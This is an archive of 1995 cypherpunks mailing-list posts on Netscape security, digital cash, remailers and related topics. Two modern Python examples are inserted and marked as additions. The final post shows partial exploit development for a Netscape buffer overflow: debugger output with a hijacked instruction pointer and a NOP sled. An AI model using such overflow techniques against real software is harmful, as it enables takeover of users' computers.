From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 26 Sep 95 17:27:37 PDT
To: Vincent Cate <vince@offshore.com.ai>
Subject: Re: real randomness for netscape - user clicking mouse
In-Reply-To: <Pine.3.89.9509261538.C922-0100000@offshore.com.ai>
Message-ID: <199509270005.UAA16643@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Vincent Cate writes:
> While it is true that on some versions of X you can watch mouse events on
> other people's computers, it is also true that on some versions you can
> watch keyboard input.

On my secure systems, when a machine running X has to be on an
insecure network, I compile the X server so that it physically lacks
the ability to speak to the network -- it does all its IPC via unix
domain sockets. However, you are correct that most people don't take
precautions like I do.

> At CMU Bennet Yee wrote a program to get people's
> passwords as they typed them in using X's poor/non-existent security back
> then.  This was before xauth. 

Xauth isn't secure, as folks have shown.

> I still think that the low bits of the mouse's X and Y positions as the
> user moves the mouse around the screen are a very good source of random
> bits for Netscape.

Agreed.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 26 Sep 95 17:32:21 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: cypherpunk press releases vs. FAQ
In-Reply-To: <199509262141.OAA24578@netcom8.netcom.com>
Message-ID: <199509270032.UAA16680@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Vladimir Z. Nuri" writes:
> earlier I advocated a press release mechanism, and this is getting
> flamed to smithereens by the more libertarian/cryptoanarchists
> elements of the group, as I predicted (but geez, accusing me
> of *deliberately* trying to start a flamewar here really hurts
> my feelings! if I were really that mischievous, the meager return would
> be quite an insult to my expertise.. <g>).

So you admit that you are, in fact, Detweiler. As if there was
any doubt.

> what I had in mind was a more FAQ-like cypherpunks document,

There is nothing wrong with Tim's document, which already exists.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 26 Sep 95 17:35:38 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape Stock Prices
Message-ID: <v02120d06ac8e4b588d84@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:45 PM 9/26/95, Jeff Simmons wrote:

>Date     High     Low   Close   Volume
>
>950809  75.000  53.750  55.500  3851.8
:
:
>950925  69.000  62.250  67.000  684.0     WSJ article re: overflow bug

Yup. Looks like the old "wall of worry" trick to me. Stand back and let the
train go buy folks, madness of crowds and all that.

Actually, Netscape is still the only game in town as far as Wall Street
goes.  What the market needs is a foregone alternative, and some lucky
sailor to mistake a tulip bulb for an onion...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 26 Sep 95 17:57:49 PDT
To: cypherpunks@toad.com
Subject: CHA_cha
Message-ID: <199509270057.UAA29759@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Worth Magazine, October, 1995, has a longish, easy-reading,
   supportive article on David Chaum and digital cash.

      Virtually alone among E-money thinkers, Chaum insists on
      creating anonymity for all transactions -- building a
      tamper-proof system that works just as "real" cash
      always has, from cowrie shells to $100 bills. The key, he
      says, is this: Without the spender's say-so, no one
      should be able to trace who paid whom for what, whether
      a transaction takes place online or in a swipe of a card
      at a coffee shop. It's a libertarian approach in tune
      with Chaum's roots in freewheeling communities such as
      Berkeley and Amsterdam -- but it is anathema to control
      freaks like the FBI, the IRS, and corporate information
      marketers.

      Chaum says every digital-cash system but his has the
      potential to be abused or compromised -- and the math
      seems to bear him out. His competitors, however, insist
      their plans will prove plenty secure in practice. They
      dismiss Chaum as an incorrigible purist, a brilliant
      mathematician and innovator whose political views are
      hindering his chances of success.

      Like many in the digital elite, Chaum, an unabashed
      utopian, does want to create a new world. To him,
      electronic money is just the first consumer use of an
      arcane field he hopes will transform society:
      cryptology, the science of secret codes. In cyberspace,
      these codes can prove a powerful way of shielding a
      person's identity -- or of verifying an identity without
      giving away extra information. Armed with personal
      computers and good software, says Chaum, ordinary people
      will finally have the power to do and say things without
      being tracked by Big Brother.


   CHA_cha  (31 kb in two parts)










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Blake <grafolog@netcom.com>
Date: Tue, 26 Sep 95 21:47:49 PDT
To: cypherpunks@toad.com
Subject: Fax encryption software
Message-ID: <Pine.3.89.9509262116.A7081-0100000@netcom7>
MIME-Version: 1.0
Content-Type: text/plain



	I saw this article in alt.privacy.

	Anybody think the described encryption actually is worth 
	looking at?


Xref: netcom.com alt.privacy:29325
Path: netcom.com!ix.netcom.com!howland.reston.ans.net!EU.net!uunet!in2.uu.net!news.deltanet.com!lkf0166
From: clav@deltanet.com
Newsgroups: alt.privacy
Subject: Re: FAX Encryption Software
Date: Mon, 18 Sep 95 12:39:53 GMT
Organization: Delta Internet Services, Anaheim, CA
Lines: 59
Message-ID: <43k3nv$m9@news1.deltanet.com>
References: <43hvft$n2b@news1.deltanet.com> <43ii1t$210@nntp.crl.com>
NNTP-Posting-Host: lkf0166.deltanet.com
X-Newsreader: News Xpress Version 1.0 Beta #3

Dear Mr. Chaos,

We are talking about a 72 bit engine that is more than 
sufficiently strong for time sensitive general business purposes. 
In addition it does not rely merely on simple factoring but a 
process called graphical encryption that adds additional 
difficulty to an attack. I would like to see if your cracking 
abilities are anywhere near your abilities to return an 
uninformed answer. I invite you to try your skill.

David
______________________________________________________________________________

In article <43ii1t$210@nntp.crl.com>, acollier@crl.com wrote:
>clav@deltanet.com wrote:
>
>>ANYONE FOR A CRYPTO-STRONG, YET EASY TO USE FAX/EMAIL SECURITY 
>>SOFTWARE PACKAGE FOR BUSINESS OR OTHER USE???
>
>>Aliroo Ltd. has developed a Windows, eye-to-eye fax/email 
>>encryption package called PrivaSoft.
>
>>Unlike any previously devised system, this method protects, with
>>only 4 mouse clicks, fax and email transmissions in electronic
>>and even paper form - FROM THE TIME YOU CREATE A MESSAGE UNTIL IT
>>IS READ - NOT JUST WHEN YOUR FAX IS BEING TRANSMITTED.
>
>>You can encrypt a message, and then fax or email it (via plain
>>old standard fax machine or fax modem), print it to paper or save
>>to a disk file.
>
>>It is fully licensed, without restriction for export, by the U.S.
>>Department of Commerce. NO PGP WORRIES.
>
>Also no worries about security - if DOC says you can have it, you can bet
>that NSA has seen to it that it is cryptographically weak, or else uses a
>key escrow system (where somebody else can get to the keys), and as insecure
>as any other non-published method.  For all we know, they may be using a
>cereal box decoder ring set up.
>
>>Email me for a free copy which will be sent to you via email or 
>>snail mail post. It is fully functional (not crippleware) and 
>>enables you to try our system out before purchase with 8 free 
>>page scrambles. It retails for $130 per installed computer. 
>>Looking for end users and distributors.
>
>>Thanks,
>>David
>
>

--

	To subscribe to Graphology-L send e-mail 
	to: listserv@netcom.com / subject: leave blank
	message:  subscribe graphology-l@netcom.com <your internet address>

	To get the Graphology-L FAQ send e-mail to
	grafolog@netcom.com / subject: hwafaq / no message

^






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pays@gctech.edelweb.fr (Paul-Andre Pays)
Date: Tue, 26 Sep 95 13:40:46 PDT
To: "Phillip M. Hallam-Baker" <hallam@w3.org>
Subject: Re: First Payments WG Meeting Announcement
Message-ID: <v01530509ac8e11166b13@[193.51.12.40]>
MIME-Version: 1.0
Content-Type: text/plain


At 15:41 26/09/95, Phillip M. Hallam-Baker wrote:
>The World Wide Web Consortium is holding a Workshop on payments. The workshop
>is intended to be a small, technically oriented meeting of its payments working
>group. Although it is a members only event I am willing to listen to special
>pleading, alternatively companies may wish to join the consortium at our
>extremely reasonable rates. See http://www.w3.org/pub/WWW/Consortium/ for
>details.
>
>--
>Phillip M. Hallam-Baker            Not speaking for anyone else
>hallam@w3.org http://www.w3.org/hypertext/WWW/People/hallam.html
>Information Superhighway -----> Hi-ho! Yow! I'm surfing Arpanet!
>
>ANNOUNCE: First W3C Payments WG Meeting, October 11
>
>----------------------------------------------------------------------------
>
>What: 1st W3C Payment WG Meeting
>
>Where: MIT EECS, Grier Room 34-401 (subject to change)
>
>When: Wednesday October 11, 9am - 5pm
>


All that is extremely fine and an awaited initiative BUT for one point
   the EXTREMELY SHORT DELAY and notification!!!!!!


Our company is just in the "joining the consortium" process,
   especially because we were expecting such an event.

However, to be able to catch a flight and spend a couple of days at MIT
  within less than a fortnight is another matter.

I don't yet know if we will be able to attend, and we really would
hate to be unable to attend and participate.
Thus I  would urge the Web Consortium to consider postponing this meeting for
at least 2 or 4 weeks so that any interested party is able
to decently cancel other commitments and get prepared for the meeting.
If W3C is really interested in attracting all interested parties,
it would be fair as I suspect we are not the only ones with

Please let me know as soon as if this is possible or if
I must as soon as possible try to change my agenda.

regards,

-- PAP



_________________________________________________________________________
PAP:  paul-andre.pays@gctech.edelWeb.fr
     tel:  +33 1 34 52 00 88                fax: +33 1 34 52 25 26
         GC Tech   "The Globe Online and Globe ID Technology Company"
  http://www.globeonline.fr/                 http://www.gctech.fr/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous Remailing Service <nobody@armadillo.com>
Date: Tue, 26 Sep 95 21:02:15 PDT
Subject: Time Keys, Some Secure Ideas (by Alias: Jay Hyden)
Message-ID: <199509270256.VAA09199@monad.armadillo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

             >> Time Keys, Some Secure Ideas <<

 The weakest attack on a time key based system is to spoof the
computer that keeps track of time into releasing encryption
keys i.e. change the clock.
 Perhaps this could be avoided by hardware inaccessibility,
say a computer system taken to, and set up on the Moon by those
corporations that are already planning to place VR rovers on
the lunar surface.
 Any Earth bound system would be vulnerable to physical attack.

Here are some ideas for such a system:

o 7 clocks with absolutely no way of resetting them. Perhaps a
  system that will only let you tell it which clock is the most
  accurate, and only if you prove you are the proper authority
  and only if 4 other clocks are on the same minute.

o Redundant hardware and power collection and data transmit
  /receive systems, flash ROM hard drives for storing secret
  keys and necessary programs and files. Built to last
  several centuries if possible.

o Key pairs could be generated on Earth, a time of release
  instruction and perhaps an optional other public key a
  (return at future date encrypted with this key option.)
  The package is then encrypted with one of the lunar
  systems keys, then transmitted to the Moon. A verification
  could be encrypted and sent back to insure data integrity.

o Other security checks in place would insure that the data
  was transmitted to the Moon by the proper authority, i.e.
  the Corp. charging for this service. Additional backup
  logic that would insure that proper power and protocol
  exist for transmissions from the lunar system.

o The key pairs are witness generated, then sent to the lunar
  system, then the secret key is destroyed on Earth. The
  public keys become a one way hash to the future until the
  time designated by the key's owner has elapsed. Then the
  lunar system would transmit the owner's secret key to Earth.

o  Upon time released instructions the lunar system would
   transmit the secret key, (encrypted if optioned) upon
   demand by a known packet radio method. So if the Corp.
   authority did not exist in say, 100 years, the data could
   still be retrieved by standard packet radio.

People who want to write to ONLY their great great grand-
children or the future world in general would have a forum.

Jay

  /"""""\    ~~ ,--------------------------------------------,   ~~ /"""""\  
 /__ - _-\  ~~ ( End HEMP Prohibition! This is an open chal- )  ~~ /-_ - __\ 
:@  (*)~(*) ~  ( lenge to Historians. Name examples of where )  ~ (*)~(*)  @:
:%/--~ ))~: ~  (& when the cultivation of legal hemp was harm-) ~ :~(( ~--/%:
 \__"-==-===*  ( ful or destructive to a society in any way! )  *===-==-"__/ 
  (:"\_)_/     (<jay.hyden@alpha.c2.com> PublicKey on Servers)     \_(_/":)  
.//:%:%:\.     '---------------------------------------------'     ./:%:%:\\.
=000o====o000===================================================000o====o000=
   |      |      |      |      |      |      |      |      |      |      |   
- -----------------------------------------------------------------------------
|      |      |      |      |      |      |      |      |      |      |     |
- -----------------------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGiLha7iRhcfEZiZAQEn0QP6A8cUmI0MHs866Mu/Ao4mFqr89F8tT3oP
KeafNdSWJt8/pOlVZzQxV8P8S8dCkXwBgJJQaQ6tigqtD2+9fK1HEaWi3ZBAVgB+
CwLhqouwds2A5+l9riQfqAT+4yrSbeNR+bH3xyYa8zZSTzp5DB1tJEbWls6Kjr/w
hxmFYrf6oSk=
=oHrR
-----END PGP SIGNATURE-----
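
Added example (not part of Jay's post): a Python model of the clock rule in the first bullet above, showing how a "nominated clock plus 4 agreeing peers" check treats tampered clocks. Judging the release time by the median of the 7 readings is an assumption made here; the post does not say how release time is read, and all readings are constructed.

```python
from datetime import datetime, timedelta

CLOCKS = 7           # "7 clocks"
REQUIRED_PEERS = 4   # "only if 4 other clocks are on the same minute"
FUTURE = datetime(2095, 1, 1, 0, 0, 0)   # constructed release date


def same_minute(a, b):
    """True when two readings fall in the same calendar minute."""
    return a.replace(second=0, microsecond=0) == b.replace(second=0, microsecond=0)


def accept_nomination(readings, nominated, authority_ok):
    """May clock `nominated` be declared the most accurate one?

    Needs proof of authority AND at least 4 *other* clocks in the same
    minute, so a holder of the authority credential who has tampered with
    fewer than 4 peers cannot promote a clock that was set forward.
    """
    if not authority_ok or len(readings) != CLOCKS:
        return False
    peers = sum(
        1
        for i, reading in enumerate(readings)
        if i != nominated and same_minute(reading, readings[nominated])
    )
    return peers >= REQUIRED_PEERS


def trusted_time(readings):
    """Median reading (assumption): shifting it takes 4 of the 7 clocks."""
    return sorted(readings)[len(readings) // 2]


def release_due(release_at, readings):
    """Release the stored secret key only once the median clock says so."""
    return trusted_time(readings) >= release_at


def constructed_readings(n_tampered, base=datetime(1995, 9, 26, 21, 2, 10)):
    """Sample data: honest clocks drift 1 s apart, tampered ones read FUTURE."""
    honest = [base + timedelta(seconds=i) for i in range(CLOCKS - n_tampered)]
    return honest + [FUTURE + timedelta(seconds=i) for i in range(n_tampered)]


if __name__ == "__main__":
    for bad in range(5):
        r = constructed_readings(bad)
        print(bad, "tampered -> early release:", release_due(FUTURE, r))
    # "Same minute" fails closed near a minute boundary: honest clocks that
    # straddle hh:mm:59 / hh:mm+1:00 can block a legitimate nomination.
    edge = constructed_readings(0, base=datetime(1995, 9, 26, 21, 0, 58))
    print("boundary, nominate clock 0:", accept_nomination(edge, 0, True))
    print("boundary, nominate clock 3:", accept_nomination(edge, 3, True))
```
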




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an215712@anon.penet.fi
Date: Tue, 26 Sep 95 15:21:03 PDT
To: cypherpunks@toad.com
Subject: Banks eyeball sci-fi style identification for ATMs
Message-ID: <9509262156.AA26030@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain




Date: Sun, 24 Sep 1995 10:20:05 PDT
  	  	
	  NEW YORK (American Banker) - Biometric identification, a 
process formerly seen only in futuristic movies and 
high-security government offices, may soon become part of the 
most common consumer banking transactions.  
	 Bankers' interest in biometric ID -- a sophisticated 
antifraud measure that exploits the fact that every human 
possesses unique physical characteristics -- dates back more 
than a decade.  
	 But until recently most banks and equipment manufacturers 
have watched the development of technology that recognizes 
fingerprints, voices, and other personal traits from a distance.  
	 That has begun to change, experts said. One of the companies 
leading the charge toward everyday use of biometric 
identification in banking is Sensar Inc., a Princeton, 
N.J.-based company that is developing an automated teller 
machine application for its patented Iriscan process.  
	 According to experts, the eye is one of the most unique 
parts of the human body and the iris biometric more reliable 
than virtually any other, including fingerprints and voice.  
	 Voices change over the course of a life, and fingerprints 
sometimes disappear on people who work with their hands.  
	 By contrast, the iris, which is the colored area of the eye, 
is stable throughout a lifetime. They are thoroughly unique and 
naturally visible.  
	 In a nutshell, the company's product, to be sold under the 
name Irisident, is being designed to capture an image of a 
consumer's eye and match it to an image on file before 
authorizing an ATM transaction.  
	 ``The research that's been done with consumers indicates 
they like the idea of having biometric verification -- it gives 
them a feeling of greater security,'' said Liam Carmody, a 
principal with the Ridgewood, N.J.-based consulting firm Carmody 
& Bloom. ``But they don't want intrusive verification.''  
	 Sensar officials understand that the use of the eye as an 
identification tool is likely to meet with skepticism from some 
bankers, who wonder whether consumers will rebel against it.  
	 However, they said their ATM application -- which should be 
available in prototype in the next few months -- is being 
designed to address the consumer concerns. And they insist that 
Irisident products will be of practical use to bankers.  
	 ``We are operating under the assumption that the consumer is 
not going to put his eye up to something to be scanned,'' said 
Kevin McQuade, vice president of strategic business development 
at Sensar.  
	 ``The breakthrough here is the ability to obtain the image 
of the eye unintrusively,'' said Thomas Drury, president and 
chief executive of Sensar, which is a unit of the David Sarnoff 
Research Center Inc., also based in Princeton.  
	 Several influential companies have committed money to the 
development of an ATM application for Sensar's technology, 
including Huntington Bancshares Inc., OKI Electric Industry 
Ltd., and a money-center bank that does not want to be 
identified.  
	 Though the bankers declined to discuss their investment in 
the project, OKI Electric has committed a minimum of $25.8 
million for development funding in return for the exclusive 
rights to market the products in Japan, where the Tokyo-based 
company is the leading vendor of ATMs.  
	 Experts said this support shows that the financial services 
industry is looking for alternatives to the personal 
identification numbers and computer passwords that have been 
compromised with increasing frequency in recent years.  
	 The choices are many, and include fingerprints, on-line 
signature verification, and even the measurement of facial 
thermal zones.  
	 ``Bankers are interested in alternatives to the PIN,'' said 
V. John Stroia, a marketing manager with Diebold, Canton, Ohio. 
Diebold and IBM operate an ATM joint venture known as InterBold.  
	 ``The major barrier is not so much the technology as getting 
the customer acclimated to'' using biometric technologies. But, 
he added, capturing sensitive biometric data -- such as that 
from the eye or face -- ``is going to have to be covertly 
done.''  
  	   	

----------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
If you reply to this message, your message WILL be *automatically* anonymized
and you are allocated an anon id. Read the help file to prevent this.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Tue, 26 Sep 95 15:22:07 PDT
To: cypherpunks@toad.com
Subject: Re: WSJ on Netscape Hole 3
In-Reply-To: <Pine.SUN.3.91.950925182134.14756E-100000@thrash.src.umd.edu>
Message-ID: <449ucq$f5d@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509252300.QAA29812@infinity.c2.org>, sameer@c2.org (sameer) writes:
> 	He's -asking- for an exploit. Tshirts to Ray and the person who
> does the exploit, if it gets written. Maybe I should just ring up 8lgm and
> have them do one.
> 
> 
> > 
> > On Mon, 25 Sep 1995, John Young wrote:
> > 
> > >    The Wall Street Journal, September 25, 1995, p. B12.
> > 
> > >    Marc Andreessen, vice president of technology at Netscape,
> > >    said the company will issue fixes for the recent glitches
> > >    later this week. He added that it's unclear whether
> > >    anything other than temporarily crashing a user's computer
> > >    could result from the recent flaw. 
> > 
> > Oh Marc, you didn't really want to say that, did you?
> > 
> > -Thomas
> > 

  I asked Marc about this one, since it bothered me too.  Apparently
Jared asked Marc if he was aware of specific examples of how this bug
might be exploited.  Marc replied that we had not seen anything
other than what was already posted on cypherpunks.

  Since the original article did not use quotes, I assume that what
was written was a paraphrase, and as such it has been interpreted
by the author.

  That said, we take this problem seriously, and have
taken steps to fix it.  The patch that will be released tomorrow
will include fixes for this buffer overflow, and others that we
found during a review of all of our code.  I think it would be
more constructive to pound on the new version than one that is
known to be busted, and will be patched by tomorrow.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 26 Sep 95 22:32:35 PDT
To: cypherpunks@toad.com
Subject: Re: chaos cryptography
Message-ID: <ac8e3166000210040c79@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



>Hi all - saw this in New Scientist and thought you might be interested
>(I guess it's more stenography than cryptography):
                    ^^^^^^^^^^^

Yes, chaotic communication is preferred by secretaries around the world.

They follow their dictates.


--Tim May


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Ingle <inglem@adnetsol.com>
Date: Tue, 26 Sep 95 22:53:38 PDT
To: digitaliberty@phantom.com
Subject: Coercion-proof remailers (solved?)
Message-ID: <199509270552.WAA00475@cryptical.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


For a while I've been talking about the importance of a robust
infrastructure for anonymity, including coercion-resistant remailers.
Here is an approach that appears to eliminate the problem of
after-the-fact coercion.

Existing remailers chain messages by using a fixed public/secret key
pair in each remailer. This leaves them open to after-the-fact
compromise from the sender end. If you capture a message as the sender
sends it, you can later get the key of the first remailer, and decrypt
the first layer. You can then proceed on down the line to the
recipient. This creates a motive for an attacker to coerce remailers,
and it means the value of the remailers' keys continually increases as
more messages are sent.

Instead of using a fixed key, the sender can perform a Diffie-Hellman
exchange with the recipient at each point in a message's passage. This
eliminates the coercion problem, since there is no permanent key to
steal, but allows a corrupt remailer to see where the message is going.
If the first remailer is corrupt, the whole path is compromised.

The next step is to make sure there is no first remailer.

The sender S generates a message and header requesting mailing     S
to the recipient R. The sender splits it into two pieces using    / \
a method that requires both pieces to recover any data. Then he  1   2
adds a header to each piece requesting remailing to remailer 3.   \ /
He sends one piece to remailer 1 and one piece to remailer 2.      3
The transmissions are protected by DH exchange and encryption.     |
Remailers 1 and 2 each send their pieces to remailer 3. These      R
transmissions are also protected by DH exchanges. Remailer 3
combines the two pieces, recovers the header requesting remailing
to R, and sends the recovered message to R.

This approach is secure against after-the-fact coercion or key theft,
because there is no persistent key to recover. It is also secure
against any one of the three remailers being corrupt. If 3 is corrupt,
it sees both pieces as it combines them, and knows they came from 1 and
2, but does not know where 1 and 2 got them from. If 1 is corrupt, it
knows that a message from S went to 3, but it has only half of the
split message, so it can't find out where 3 sent it to. If any two of
the three are corrupt, the path is exposed.

It is possible to add more levels. This one uses seven remailers,  /S\
and can survive any two being corrupt. Some questions I don't    / | | \
know the answers to: What is the best possible arrangement of   1  2 3  4
remailers, so that the highest percentage of them have to be     \ / \ /
corrupt before the path is revealed? If any continuous line       5   6
from S to R is corrupt, the path is revealed. And if any two       \ /
remailers in a 'triangle' are corrupt, the whole triangle is        7
corrupt. For example, 1 and 2, 1 and 5, or 2 and 5.                 |
Is there a better arrangement, reusing some remailers, that         R
allows the message to remain secure with a higher number of corrupt
remailers in the path?

							Mike
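
Added example (not part of Mike's post): a Python model of the three-remailer arrangement described above, checking which sets of colluding remailers can link S to R. The XOR split as the "both pieces required" method, the `Remail-To:` header name and the addresses are assumptions made for the demo; the per-hop DH link encryption is not modelled.

```python
import secrets
from itertools import combinations

PREFIX = b"Remail-To: "   # hypothetical header name, not from any real remailer


def split(data):
    """Two-piece XOR split: either piece alone is uniformly random bytes."""
    pad = secrets.token_bytes(len(data))
    return pad, bytes(p ^ d for p, d in zip(pad, data))


def combine(a, b):
    """Recombine the two pieces produced by split()."""
    return bytes(x ^ y for x, y in zip(a, b))


def send(sender, recipient, body):
    """Run S -> {1, 2} -> 3 -> R and record what each remailer observes.

    Link encryption hides traffic from outside observers, not from the
    remailer that terminates the link, so each view holds plaintext pieces.
    """
    inner = PREFIX + recipient.encode() + b"\n\n" + body
    piece_a, piece_b = split(inner)
    views = {
        1: {"received_from": {sender}, "pieces": {"a": piece_a}},
        2: {"received_from": {sender}, "pieces": {"b": piece_b}},
        3: {
            "received_from": {"remailer-1", "remailer-2"},
            "pieces": {"a": piece_a, "b": piece_b},
        },
    }
    # Remailer 3 combines the halves and reads the remailing header.
    header, _, payload = combine(piece_a, piece_b).partition(b"\n\n")
    return views, header[len(PREFIX):].decode(), payload


def coalition_learns(views, members, sender):
    """What colluding remailers reconstruct by pooling their observations."""
    pooled = {}
    saw_sender = False
    for m in members:
        pooled.update(views[m]["pieces"])
        saw_sender = saw_sender or sender in views[m]["received_from"]
    recipient = None
    if len(pooled) == 2:   # both halves present: the header is recoverable
        header = combine(pooled["a"], pooled["b"]).partition(b"\n\n")[0]
        recipient = header[len(PREFIX):].decode()
    return {"sender": sender if saw_sender else None, "recipient": recipient}


def path_exposed(views, members, sender):
    """The path is exposed when one coalition knows both endpoints."""
    learned = coalition_learns(views, members, sender)
    return learned["sender"] is not None and learned["recipient"] is not None


def exposure_table(views, sender):
    """Map every coalition of 1..3 remailers to whether it links S to R."""
    return {
        c: path_exposed(views, c, sender)
        for size in (1, 2, 3)
        for c in combinations(sorted(views), size)
    }


if __name__ == "__main__":
    # Constructed addresses and message body.
    v, to, payload = send("alice@example.org", "bob@example.org", b"hello")
    print("delivered to", to, "payload", payload)
    for coalition, exposed in exposure_table(v, "alice@example.org").items():
        print(coalition, "exposed" if exposed else "safe")
```
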

  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Tue, 26 Sep 95 23:16:32 PDT
To: Jonathan Blake <cypherpunks@toad.com
Subject: Re: Fax encryption software
Message-ID: <199509270616.XAA16763@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:34 PM 9/26/95 -0700, Jonathan Blake wrote:
>
>	I saw this article in alt.privacy.
>
>	Anybody think the described encryption actually is worth 
>	looking at.
>
> We are talking about a 72 bit engine that is more than 
> sufficiently strong for time sensitive general business purposes. 

Since David does not know the difference between CPU word
width and an encryption algorithm, I think it is safe to 
ignore him.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Tue, 26 Sep 95 06:37:42 PDT
To: craig@passport.ca (Craig Hubley)
Subject: Re: cypherpunks press releases/contact list: YES!! DO IT!!
In-Reply-To: <m0sxU3V-001BjIC@passport.ca>
Message-ID: <199509261336.XAA20707@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello craig@passport.ca (Craig Hubley)
  and perry@piermont.com
  and cypherpunks@toad.com

craig@passport.ca (Craig Hubley) writes:
...
> > we've gone over this many times. We aren't a group. We're a mailing
> > list. We've got a diversity of opinions, and we have no organization
...
> True enough, but there are sometimes rough consenses on technical questions,
...
Consenses or consensuses or consenci? Maybe consensen? Consensix?

> "Consensus on cypherpunks seems to be that 40 bit encryption is not viable
>  for commercial applications, and that Netscape seems to have taken less
>  than due care to choose an appropriate random seed for its session keys."

Careful there, that comma is rather small to be between two completely
unrelated statements. You might want a semicolon, full stop or
better yet a paragraph break.

If you want another to make a round number, how about something
about GAK and a-screwed keys? I think there's a consensus on
that one... (definitely stronger than on the Netscape point, anyway)


Good luck, anyway!

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMGgB5SxV6mvvBgf5AQHvuAQAihd2DyYnbhwQL2lHcs0qhnmS7U5pguGu
YLCPszybtprsOJ818K5RpFcBFkg+n8TALMONovyt/IDQjo3LLWvx/XO+MrbeLdLU
EpgOo1O73z2/GpcCmmGaamzt9+0+lXc05Xnepl3iwihgQtWgG+XUyLcASKk28/SJ
JvwzwIbttc4=
=L7Vi
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 26 Sep 95 20:38:18 PDT
To: cypherpunks@toad.com
Subject: Status of Netscape Bug Exploit (suggestions needed)
Message-ID: <199509270338.XAA09600@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



Ok Folks, here's what I got so far...


1) a URL that can place a specific value in the program counter

(gdb) select-frame 2
(gdb) info frame
Stack level 2, frame at 0xefbfbc30:
 eip = 0xefbfbc30; saved eip 0x90909090
 ^^^^^^^^^^^^^^^^
 called by frame at 0x90909090, caller of frame at 0xefbfbc14
 Arglist at 0xefbfbc30, args: 
 Locals at 0xefbfbc30, Previous frame's sp is 0xefbfbc1c
 Saved registers:
  eax at 0xefbfbc2c, ecx at 0xefbfbc28, edx at 0xefbfbc24, ebx at 0xefbfbc20,
  ebp at 0xefbfbc18, esi at 0xefbfbc14, edi at 0xefbfbc10, eip at 0xefbfbc0c,
  ps at 0xefbfbc08
 
2) A piece of exploit code on the stack near the PC

(gdb) disassemble 0xefbfbc10 0xefbfbc40
0xefbfbc27:     nop    
0xefbfbc28:     nop    
0xefbfbc29:     nop    
0xefbfbc2a:     nop
0xefbfbc2b:     nop    
0xefbfbc2c:     nop    
0xefbfbc2d:     nop    
0xefbfbc2e:     nop    
0xefbfbc2f:     nop    
0xefbfbc30:     nop    
0xefbfbc31:     nop    
0xefbfbc32:     nop    
0xefbfbc33:     nop    
0xefbfbc34:     nop    
0xefbfbc35:     nop    
0xefbfbc36:     nop    
0xefbfbc37:     nop    
0xefbfbc38:     nop    
0xefbfbc39:     nop    
0xefbfbc3a:     nop    
0xefbfbc3b:     nop    
0xefbfbc3c:     nop    
0xefbfbc3d:     nop    
0xefbfbc3e:     nop    
0xefbfbc3f:     nop    
